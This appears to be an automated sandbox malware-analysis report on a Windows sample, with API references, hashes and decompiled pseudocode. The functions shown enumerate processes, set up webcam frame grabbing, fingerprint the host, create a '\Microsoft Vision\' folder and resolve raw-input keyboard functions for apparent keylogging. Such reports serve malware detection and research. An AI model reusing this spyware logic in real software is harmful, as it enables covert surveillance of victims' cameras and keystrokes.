                                      0x0025eeb5
                                      0x0025eeb7
                                      0x0025eeb9
                                      0x0025eeb9
                                      0x0025eebe
                                      0x0025eec3
                                      0x0025eec3
                                      0x0025eec3
                                      0x0025eeb9
                                      0x0025eeb7
                                      0x0025ed19
                                      0x0025ed19
                                      0x0025ed21
                                      0x0025ed27
                                      0x0025ed29
                                      0x0025ed6c
                                      0x0025ed75
                                      0x0025ed7f
                                      0x0025ed82
                                      0x0025ed85
                                      0x0025ed9c
                                      0x0025ed9e
                                      0x0025eda1
                                      0x0025ee38
                                      0x0025ee40
                                      0x0025ee45
                                      0x0025ee45
                                      0x0025ee45
                                      0x0025eda7
                                      0x0025edb5
                                      0x0025edba
                                      0x0025edbd
                                      0x0025edcc
                                      0x0025edd2
                                      0x0025edd4
                                      0x0025ee0d
                                      0x0025ee15
                                      0x0025ee1a
                                      0x0025ee1a
                                      0x0025ee1a
                                      0x0025edd6
                                      0x0025ede9
                                      0x0025edf1
                                      0x0025edf6
                                      0x0025edf6
                                      0x0025ee1f
                                      0x0025ee1f
                                      0x0025ee4c
                                      0x0025ee4f
                                      0x0025ee51
                                      0x0025ee5a
                                      0x0025ee66
                                      0x0025ee6e
                                      0x0025ee76
                                      0x0025ee83
                                      0x0025ee89
                                      0x0025ee8b
                                      0x0025ee8c
                                      0x0025ee8c
                                      0x0025ee95
                                      0x00000000
                                      0x0025ed2b
                                      0x0025ed2c
                                      0x0025ed38
                                      0x0025ed3d
                                      0x0025ed42
                                      0x0025ed48
                                      0x0025ed4e
                                      0x0025ed52
                                      0x0025ed58
                                      0x0025ed58
                                      0x0025ed5d
                                      0x0025ed62
                                      0x0025ed62
                                      0x0025ed67
                                      0x0025ed52
                                      0x0025ed42
                                      0x0025ed29
                                      0x0025eece

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0025ED08
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0025ED21
                                      • CloseHandle.KERNEL32(00000000), ref: 0025ED2C
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 0025ED96
                                      • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0025EDCC
                                      • CloseHandle.KERNEL32(00000000), ref: 0025EE1F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0025EE83
                                      • CloseHandle.KERNEL32(00000000), ref: 0025EE95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                      • String ID:
                                      • API String ID: 3514491001-0
                                      • Opcode ID: caff6ca00bf566ff5a10f7ff99f8e603ce8bcd1b0e690bbf2d8789fb3545bf94
                                      • Instruction ID: b2438ac27c3da15173a1f79d2ebe00bd228e953afc420d851bdd21a92cd5115f
                                      • Opcode Fuzzy Hash: caff6ca00bf566ff5a10f7ff99f8e603ce8bcd1b0e690bbf2d8789fb3545bf94
                                      • Instruction Fuzzy Hash: E451B372D20519ABCB14EBA0DD4AAEEB778AF44712F0101A5EC05B3191DB709F6DCF98
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 55%
                                      			E00260AD0(signed int __ecx, signed int _a4) {
                                      				intOrPtr _v38;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				void* _v112;
                                      				char _v128;
                                      				intOrPtr _v132;
                                      				char _v200;
                                      				intOrPtr _t49;
                                      				intOrPtr* _t54;
                                      				intOrPtr* _t58;
                                      				intOrPtr* _t60;
                                      				intOrPtr* _t71;
                                      				signed int _t76;
                                      				intOrPtr* _t78;
                                      				intOrPtr* _t79;
                                      				intOrPtr* _t80;
                                      				intOrPtr* _t85;
                                      				signed int _t91;
                                      				intOrPtr* _t96;
                                      				intOrPtr* _t97;
                                      				intOrPtr* _t104;
                                      				signed int _t107;
                                      				intOrPtr* _t111;
                                      				intOrPtr* _t112;
                                      				intOrPtr* _t113;
                                      				intOrPtr* _t118;
                                      				void* _t119;
                                      				void* _t120;
                                      				void* _t121;
                                      
                                      				_t76 = __ecx;
                                      				__imp__CoInitialize(0);
                                      				_t1 = _t76 + 0x18; // 0x3c0a70
                                      				_t111 = _t1;
                                      				__imp__CoCreateInstance(0x262560, 0, 1, 0x264854, _t111);
                                      				_t78 =  *_t111;
                                      				if(_t78 != 0) {
                                      					_t2 = _t76 + 0x1c; // 0x3c0a74
                                      					_t104 = _t2;
                                      					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x262540, _t104);
                                      					_t79 =  *_t104;
                                      					if(_t79 != 0) {
                                      						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
                                      						_t4 = _t76 + 0x20; // 0x3c0a78
                                      						_t112 = _t4;
                                      						if(_t112 != 0) {
                                      							_t49 = E00260831(_a4, _t112);
                                      						}
                                      						if( *_t112 != 0) {
                                      							_t6 = _t76 + 0x24; // 0x3c0a7c
                                      							_t113 = _t6;
                                      							__imp__CoCreateInstance(0x2625b0, 0, 1, 0x264844, _t113);
                                      							_t80 =  *_t113;
                                      							if(_t80 != 0) {
                                      								_t7 = _t76 + 0x20; // 0x0
                                      								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *_t7, L"Source");
                                      								_t54 =  *_t113;
                                      								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
                                      								E00251052( &_v128, 0, 0x48);
                                      								_t11 = _t76 + 0x18; // 0x0
                                      								_t58 =  *_t11;
                                      								_t121 = _t120 + 0xc;
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
                                      								_t49 = E0026044E();
                                      								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
                                      								if(_t49 != 0) {
                                      									_t49 = E0026046A();
                                      									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
                                      									if(_t49 != 0) {
                                      										_t20 = _t76 + 0x24; // 0x0
                                      										_t85 =  *_t20;
                                      										_t21 = _t76 + 0x28; // 0x0
                                      										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *_t21, _t49);
                                      										if(_t49 >= 0) {
                                      											_t23 = _t76 + 0x18; // 0x0
                                      											_t60 =  *_t23;
                                      											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
                                      											E0025102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
                                      											E002602B1( &_v200);
                                      											_t107 = _a4;
                                      											E002608F0(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
                                      											_t35 = _t76 + 0xc; // 0x0
                                      											E0025582B(_t76 & 0xffffff00 | _t107 -  *_t35 > 0x00000000);
                                      											_t38 = _t76 + 4; // 0x0
                                      											_t91 = 7;
                                      											memcpy(_t121 + 0xc - 0x1c,  *( *_t38 + _t107 * 4), _t91 << 2);
                                      											E0026039E( *_t76);
                                      											_t49 = E0026044E();
                                      											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
                                      											if(_t49 != 0) {
                                      												_t44 = _t76 + 0x18; // 0x0
                                      												_t71 =  *_t44;
                                      												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
                                      												_t46 = _t76 + 0x24; // 0x0
                                      												_t96 =  *_t46;
                                      												_t47 = _t76 + 0x34; // 0x3c0a8c
                                      												_t118 = _t47;
                                      												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x262580, _t118);
                                      												_t97 =  *_t118;
                                      												if(_t97 != 0) {
                                      													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t49;
                                      			}

                                      Instruction addresses (one per decompiled statement): 0x00260ade to 0x00260c97

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00260AE0
                                      • CoCreateInstance.OLE32(00262560,00000000,00000001,00264854,003C0A70), ref: 00260AF8
                                      • CoCreateInstance.OLE32(002625B0,00000000,00000001,00264844,003C0A7C), ref: 00260B52
                                        • Part of subcall function 00260831: CoCreateInstance.OLE32(002625A0,00000000,00000001,00264834,?), ref: 0026085F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$Initialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 1108742289-4200688928
                                      • Opcode ID: a0112be5fed505663dece1a6677a1c21f1aff278b30d1a1d577af65d9dd5c373
                                      • Instruction ID: 98ae4c42c9cbb04c22918db6ebf6d735013a88adac7872fc17ac8f2af4fba1e1
                                      • Opcode Fuzzy Hash: a0112be5fed505663dece1a6677a1c21f1aff278b30d1a1d577af65d9dd5c373
                                      • Instruction Fuzzy Hash: 79519B71A10601AFCB28DF64CCD5F9A3766EF49700B2045A8FD05AF295DBB1E8A5CF90
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      APIs
                                      • GetConsoleCP.KERNEL32 ref: 012EAC7B
                                      • __fassign.LIBCMT ref: 012EACFA
                                      • __fassign.LIBCMT ref: 012EAD19
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 012EAD46
                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 012EAD66
                                      • WriteFile.KERNEL32(?,012ED148,00000001,?,00000000), ref: 012EADA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 374ea1649a4082b1562af309e5b440ef0be241f6768767a2f5457a40c21c0f78
                                      • Instruction ID: cb791077f9acbe54bee0b12be677daad32336f30e2613279f58b5a63bb09fa07
                                      • Opcode Fuzzy Hash: 374ea1649a4082b1562af309e5b440ef0be241f6768767a2f5457a40c21c0f78
                                      • Instruction Fuzzy Hash: 9E51C470D1024AAFDB10CFA8D899AEEBBF8FF09311F14816AE656E7251D731D941CB60
                                      Uniqueness

                                      Uniqueness Score: 0.61%

                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 012E1DFB
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 012E1E03
                                      • _ValidateLocalCookies.LIBCMT ref: 012E1E91
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 012E1EBC
                                      • _ValidateLocalCookies.LIBCMT ref: 012E1F11
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 4a727742874cb20b7994b7dd8376a6447adcdcc66524052ac64672d2e1378fd8
                                      • Instruction ID: 2eb382d2d37a3fe6ce45fb259258dc32a81063b519d05e6f4864b1678e055f40
                                      • Opcode Fuzzy Hash: 4a727742874cb20b7994b7dd8376a6447adcdcc66524052ac64672d2e1378fd8
                                      • Instruction Fuzzy Hash: 8E41D634E2020ADBCF10DF6CC8489AEBFF9AF44314F488065E9155B395D771DA25CB90
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 95%
                                      			E00252B29(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				char _v76;
                                      				char _v344;
                                      				short _v864;
                                      				void* __edi;
                                      				void* _t28;
                                      				void* _t32;
                                      				void* _t35;
                                      				void* _t36;
                                      				void* _t37;
                                      				void* _t54;
                                      				void* _t75;
                                      				void* _t76;
                                      				void* _t81;
                                      				void* _t82;
                                      				void* _t84;
                                      
                                      				_t84 = __eflags;
                                      				_t54 = __ecx;
                                      				_t76 = __edx;
                                      				E0025D7A9(E0025D8DA( &_v24, __edx),  &_v20);
                                      				GetModuleFileNameA(0,  &_v344, 0x104);
                                      				_v16 = 0;
                                      				_t28 = E0025FC79( &_v344,  &_v16);
                                      				_v12 = 0;
                                      				E0025F9F3(_t28, _v16,  &_v12,  &_v12);
                                      				_t82 = _t81 + 4;
                                      				E00253412(_t82, _v20);
                                      				E00253412(_t82, _v24);
                                      				_t32 = E0025D9BA();
                                      				E00253412(_t82, 0x262608);
                                      				_t64 = _t82;
                                      				E0025DC19(_t82);
                                      				_t35 = E0025DBF3(_t82);
                                      				_t36 = E0025DB97();
                                      				_t37 = E0025D9DD();
                                      				E0025DC53(_t82, _v16);
                                      				E00254B53(_t54, E00253EA1( &_v76, _v16, _t84, _t82, _t64, 0xdc, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
                                      				E00253E5F( &_v76, _t76);
                                      				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
                                      					E00251052( &_v864, 0, 0x208);
                                      					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
                                      					lstrcatW( &_v864, L"\\Microsoft Vision\\");
                                      					CreateDirectoryW( &_v864, 0);
                                      					E002585B6(_t54, 1);
                                      					_v12 = 0x264970;
                                      					E00254B53(_t54,  &_v12);
                                      				}
                                      				E00255A2D(_v20);
                                      				return E00255A2D(_v24);
                                      			}

                                      Instruction addresses (one per decompiled statement): 0x00252b29 to 0x00252c6c

                                      APIs
                                        • Part of subcall function 0025D7A9: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0025D7C0
                                        • Part of subcall function 0025D7A9: CoInitialize.OLE32(00000000), ref: 0025D7C7
                                        • Part of subcall function 0025D7A9: CoCreateInstance.OLE32(00262460,00000000,00000017,00264330,?), ref: 0025D7E5
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00252B58
                                        • Part of subcall function 0025FC79: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0025FCA6
                                        • Part of subcall function 0025FC79: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,00252B6F), ref: 0025FCB1
                                        • Part of subcall function 0025FC79: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0025FCC2
                                        • Part of subcall function 0025FC79: CloseHandle.KERNEL32(00000000), ref: 0025FCC9
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025D9BA: GlobalMemoryStatusEx.KERNEL32(?), ref: 0025D9CB
                                        • Part of subcall function 0025DC19: GetComputerNameW.KERNEL32(00252BB8,00000010), ref: 0025DC3C
                                        • Part of subcall function 0025DBF3: GetCurrentProcess.KERNEL32(?,?,00252BBD,?,00262608,?,?,00000000,?,?,?), ref: 0025DBF7
                                        • Part of subcall function 0025DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                        • Part of subcall function 0025DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
                                        • Part of subcall function 0025DB97: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0025DBCE
                                        • Part of subcall function 0025DB97: CloseHandle.KERNEL32(00000000), ref: 0025DBE3
                                        • Part of subcall function 0025D9DD: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D9F5
                                        • Part of subcall function 0025D9DD: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025DA05
                                        • Part of subcall function 0025DC53: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0025DC97
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00252C18
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00252C2A
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00252C38
                                        • Part of subcall function 002585B6: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585C2
                                        • Part of subcall function 002585B6: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585D9
                                        • Part of subcall function 002585B6: EnterCriticalSection.KERNEL32(002677C8,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585E5
                                        • Part of subcall function 002585B6: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585F5
                                        • Part of subcall function 002585B6: LeaveCriticalSection.KERNEL32(002677C8,?,00000000), ref: 00258648
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                      • String ID: \Microsoft Vision\$pI&
                                      • API String ID: 1987359387-1661440369
                                      • Opcode ID: ec5038f74bdd426eeb5a7b96629c9e20d260604b9fac989f54e96786c946dbe0
                                      • Instruction ID: 56bcbd09b8b17df4f0797fba86a21da49fcc901827710c632791dc2bf5e49d7f
                                      • Opcode Fuzzy Hash: ec5038f74bdd426eeb5a7b96629c9e20d260604b9fac989f54e96786c946dbe0
                                      • Instruction Fuzzy Hash: C231B0B1A20518BBCB14FBA0DC56DEEB77CAF44306F004065B905A2182DA705E6DCFA9
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                        • Part of subcall function 012E987E: _free.LIBCMT ref: 012E98A3
                                      • _free.LIBCMT ref: 012E9904
                                        • Part of subcall function 012E628A: HeapFree.KERNEL32(00000000,00000000), ref: 012E62A0
                                        • Part of subcall function 012E628A: GetLastError.KERNEL32(?,?,012E98A8,?,00000000,?,00000000,?,012E98CF,?,00000007,?,?,012E9CD3,?,?), ref: 012E62B2
                                      • _free.LIBCMT ref: 012E990F
                                      • _free.LIBCMT ref: 012E991A
                                      • _free.LIBCMT ref: 012E996E
                                      • _free.LIBCMT ref: 012E9979
                                      • _free.LIBCMT ref: 012E9984
                                      • _free.LIBCMT ref: 012E998F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 815bc0071f0b4a8f649899424cf45e433ae55eb76270d98698b1a9d2e1f79aa2
                                      • Instruction ID: c7cde9d29854c209ee8c07940e0dbef61dfae28f49ca54fd6698e54706e11232
                                      • Opcode Fuzzy Hash: 815bc0071f0b4a8f649899424cf45e433ae55eb76270d98698b1a9d2e1f79aa2
                                      • Instruction Fuzzy Hash: 66114F71564B05EAE920FBB0CC09FEB77DC6F25704F800A16A29BAA071DE76F5448B90
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      C-Code - Quality: 100%
                                      			E002585B6(char _a4, intOrPtr _a8) {
                                      				void _v28;
                                      				void* _t13;
                                      				signed int _t14;
                                      
                                      				InitializeCriticalSection( &_v28);
                                      				_t14 = 6;
                                      				DeleteCriticalSection(memcpy(0x2677c8,  &_v28, _t14 << 2));
                                      				EnterCriticalSection(0x2677c8);
                                      				_t5 =  &_a4; // 0x252c46
                                      				 *0x2677f0 =  *_t5;
                                      				GetModuleHandleA(0);
                                      				 *0x266690 = 0x266da0;
                                      				if(_a8 == 0) {
                                      					E00251E9A(0x267814);
                                      					 *0x266da0 = 1;
                                      					_t13 = E00251E6F(0x26780c, E0025822F, 0x266da0);
                                      				} else {
                                      					_t13 = E00251E6F(0x267814, E002574B4, 0x266da0);
                                      					 *0x2677b4 = 1;
                                      				}
                                      				LeaveCriticalSection(0x2677c8);
                                      				return _t13;
                                      			}


                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585C2
                                      • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585D9
                                      • EnterCriticalSection.KERNEL32(002677C8,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585E5
                                      • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00252C46,?,00000001,?,?), ref: 002585F5
                                      • LeaveCriticalSection.KERNEL32(002677C8,?,00000000), ref: 00258648
                                        • Part of subcall function 00251E6F: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00251E84
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                      • String ID: F,%
                                      • API String ID: 2964645253-4184053641
                                      • Opcode ID: 876bdbc4d538361e579dabd1599055f47ab069d8f1e19f80017fa277b75877db
                                      • Instruction ID: c3f90b29bb3707c03e551cda2f1b7bbdaa365261b1427b255a1797cf61fe7a2e
                                      • Opcode Fuzzy Hash: 876bdbc4d538361e579dabd1599055f47ab069d8f1e19f80017fa277b75877db
                                      • Instruction Fuzzy Hash: 20015E319282149BCB00AF54FC0EB9F7B69EB86756F008055FA0997292C7F58469CBA5
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 79%
                                      			E00258654() {
                                      				intOrPtr _t1;
                                      
                                      				_t1 = 5;
                                      				 *0x2677c4 = _t1;
                                      				 *0x266dac = 0;
                                      				 *0x2677bc = _t1;
                                      				 *0x2677c0 = 0;
                                      				E00251815(0x2677b8, 0);
                                      				InitializeCriticalSection(0x2677c8);
                                      				E0025DE6C(0x2677f4, 0);
                                      				asm("xorps xmm0, xmm0");
                                      				 *0x2677e0 = 0;
                                      				asm("movups [0x26780c], xmm0");
                                      				 *0x2677f0 = 0;
                                      				_t19 = LoadLibraryW(L"User32.dll");
                                      				_push(0x2677f4);
                                      				 *0x2677e4 = E0025E907(_t4, "GetRawInputData", 0);
                                      				 *0x2677ec = E0025E907(_t19, "ToUnicode", 0);
                                      				 *0x2677e8 = E0025E907(_t19, "MapVirtualKeyA", 0);
                                      				return 0x266da0;
                                      			}


                                      APIs
                                      • InitializeCriticalSection.KERNEL32(002677C8,?,002511C1), ref: 0025867F
                                      • LoadLibraryW.KERNEL32(User32.dll), ref: 002586AA
